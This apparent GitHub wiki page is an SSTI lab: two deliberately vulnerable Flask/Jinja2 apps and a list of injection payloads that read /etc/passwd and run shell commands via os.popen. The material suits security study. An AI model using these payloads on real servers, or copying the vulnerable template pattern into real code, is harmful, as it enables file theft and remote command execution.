SSTI python 01 - yujitounai/helloworld GitHub Wiki
# for this we need to install flask
# pip3 install flask
from flask import *
app = Flask(__name__)
@app.route('/',methods=['GET', 'POST'])
def base():
person = ""
if request.method == 'POST':
if request.form['name']:
person = request.form['name']
template = '<!DOCTYPE html><html><body>\
<form action="/" method="post">\
First name:<br>\
<input type="text" name="name" value="">\
<input type="submit" value="Submit">\
</form><h2>Hello %s! </h2></body></html>' % person
return render_template_string(template)
if __name__=="__main__":
app.run("0.0.0.0",port = 5000,debug=False)
from flask import Flask, request
from jinja2 import Environment
app = Flask(__name__)
Jinja2 = Environment()
@app.route("/")
def page():
name = request.values.get('name')
# SSTI VULNERABILITY
# The vulnerability is introduced concatenating the
# user-provided `name` variable to the template string.
output = Jinja2.from_string('Hello ' + name + '!').render()
# 脆弱性のないコード
# Jinja2.from_string('Hello {{name}}!').render(name = name)
return output
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5080)
{{7*7}}
{{config.items()}}
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}